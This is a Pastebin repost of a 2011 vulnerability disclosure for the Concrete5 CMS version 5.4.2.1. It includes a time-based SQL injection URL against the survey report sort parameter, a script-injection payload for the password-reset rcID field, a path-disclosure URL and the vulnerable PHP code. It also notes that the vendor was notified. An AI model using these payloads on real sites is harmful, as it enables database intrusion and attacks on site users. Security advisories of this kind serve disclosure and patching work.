Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .!JQ
- :MQMQQQQQMQQ!
- QQQMQMQMQMQMQ
- *QQQMQMQMQMQQ.
- MMQQMQMQMQMQM
- QMQQMQMQMQMQQ. MMQQQQQMQM
- QQQQMQQMQQMQQMJ JQ: J
- QQQQQQM+QQQMM* *QQ : +MQQMQQMQQQJ
- MQQQQQ! .+MQQQQQQ* + !MQQQQM* M
- MQQQQM .QMQMQJ JQQM.*
- *QMQQM QQ. M
- .QQQMQQ MQQ Q :
- .QMQQMQQMQMQMQQM!:QMQMQ! MQQMQMQQQQ:JM+
- QQM :++J*. !MQMQMQ+ !+JJ*. M+
- QQ ! QMQQQQ !
- QM :QQMQQQ
- QQ +MQQMQMQ
- QM QQQMQQQQM
- MQ QQMQQMQQ: !
- +M. .QQQQQMQQQQ QM :
- .MJ MQMQQ: :MQMQ! *QQQ *MQJQ
- MQ. Q:MQ !QMQQMQ: :QM +J
- QM +J QMQ: MMQQM!QMQM: JQQJ .M
- QQ Q: !MQQMQQQQQQMJ QQQMQQQQQMQM Q.
- QM Q. :*+! . .*++*: Q.
- QM* Q+ +Q
- !QQ :Q M.
- QQ M: QMQQM+ *+
- :QQ Q MQQJ Q
- MQ M !QQMQ *
- QJ : QMQMQM !
- !M . QQMQMM +
- Q! JQQQQ. !
- J QMQQ .
- +QQ
- QJ
- # Exploit Title: Concrete5 <= 5.4.2.1 SQL Injection AND XSS Vulnerabilities
- # DATE: 2011-10-04
- #Published: ☠Cantuaria (http://brzu.net/0h3)
- # Author: Ryan Dewhurst
- # Software Link:
- http://sourceforge.net/projects/concretecms/files/concrete5/5.4.2.1/
- # Version: 5.4.2.1 (tested)
- 1.Vulnerability Description
- Multiple SQL Injection, Cross-Site Scripting (XSS) AND Information
- Disclosure vulnerabilities were IDENTIFIED WITHIN Concrete5 version
- 5.4.2.1
- Please note: ONLY a SELECT few vulnerabilities are outlined IN this
- disclosure, many other vulnerabilities were discovered. Due TO TIME
- restraints ONLY a small sample
- OF the vulnerabilities are outlined below. The vendor was contacted
- AND replied promptly. Further assistance was asked FOR but NOT
- delivered due TO my TIME constraints.
- 2.Software Description
- CMS made FOR Marketing but built FOR Geeks, concrete5 [0] IS a content
- management system that IS free AND OPEN SOURCE.
- 3.SQLi PoC [1] (authenticated USER)
- http://concrete5.4.2/INDEX.php/dashboard/reports/surveys/?ccm_order_by=numberOfResponses&ccm_order_dir=,(SELECT
- BENCHMARK(1000000,MD5(1)) FROM btSurveyResults WHERE CURRENT_USER()
- LIKE 'root@localhost' LIMIT 1) --
- 4.Vulnerable code
- File: concrete/controllers/dashboard/reports/surveys.php
- class SurveyList extends DatabaseItemList {
- protected $itemsPerPage = 10;
- protected $autoSortColumns = array('cvName', 'question',
- 'numberOfResponses', 'lastResponse');
- FUNCTION __construct() {
- $this->setQuery(
- 'select distinct btSurvey.bID,
- CollectionVersions.cID, btSurvey.question, CollectionVersions.cvName,
- (select max(timestamp) from btSurveyResults where btSurveyResults.bID
- = btSurvey.bID and btSurveyResults.cID = CollectionVersions.cID) as
- lastResponse, (select count(timestamp) from btSurveyResults where
- btSurveyResults.bID = btSurvey.bID and btSurveyResults.cID =
- CollectionVersions.cID) as numberOfResponses ' .
- 'from btSurvey, CollectionVersions,
- CollectionVersionBlocks');
- $this->FILTER(FALSE, 'btSurvey.bID =
- CollectionVersionBlocks.bID');
- $this->FILTER(FALSE, 'CollectionVersions.cID =
- CollectionVersionBlocks.cID');
- $this->FILTER(FALSE, 'CollectionVersionBlocks.cvID =
- CollectionVersionBlocks.cvID');
- $this->FILTER(FALSE, 'CollectionVersions.cvIsApproved = 1');
- $this->userPostQuery .= 'group by btSurvey.bID,
- CollectionVersions.cID';
- }
- }
- 5.Cross-Site Scripting (XSS)
- Page: http://192.168.1.105/concrete5.4.2/INDEX.php/login/forgot_password/
- Parameter: rcID
- Method: POST
- PoC: "><script>alert(1)</script>
- 6.Vulnerable Code
- File: concrete/single_pages/login.php:
- <input type="hidden" name="rcID" value="<?php echo $rcID?>" />
- 7.Full Path Disclosure (FPD)
- http://concrete5.4.2/index.php/tools/blocks/page_list/blog_rss?bID=30&cID='&arHandle=Main
- 8.Vulnerability Timeline
- 2011-09-06 - Reported to vendor
- 2011-09-06 - Vendor Reply
- 2011-09-07 - Vendor Acknowledge Vulnerabilities and asked for
- assistance patching. No assistance given apart from the initial report
- due to time constraints.
- 2011-10-04 - Vulnerability Disclosed
- 9.References
- [0] http://www.concrete5.org/
- [1] http://www.bonsai-sec.com/blog/index.php/not-the-average-sql-injection/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement